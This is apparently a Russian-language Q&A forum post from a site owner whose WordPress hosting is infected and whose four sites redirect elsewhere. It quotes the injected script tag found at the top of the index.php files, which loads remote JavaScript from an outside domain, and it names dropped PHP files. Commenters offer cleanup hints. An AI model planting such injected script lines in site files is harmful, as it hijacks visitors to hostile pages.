# Хостинг заражен вирусом

Tags: php, wordpress, hosting

Хостинг заражен вирусом и все сайты на ном (4) перенаправляется на другие сайты. В начале всех файлах `index.php` появился вот такой код:

`<script type='text/javascript' async src='https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000'></script>`

А еще есть вот такие странные файлы - `Jwlsjd_woiqusjfx.php`,  `oihfoe09fposf.php`

Я удалил эти файлы и строки, но сайты все равно перенаправляется. Как мне решить эту проблему ?

Comment: **.htaccess** смотрели? БД и конфиги WP?

Comment: Да смотрел, вроде все нормально.

Comment: А куда кидает? И как?  В хроме включите в дев тулсе **Preserve log** и посмотрите пути и коды ответа сервера.

Comment: Вот этот сайт - bagim.az

Comment: I etot bakireklam.az

Comment: https://ru.stackoverflow.com/questions/777029/%d0%92%d0%b8%d1%80%d1%83%d1%81%d1%8b-%d0%b2-wordpress/777040#777040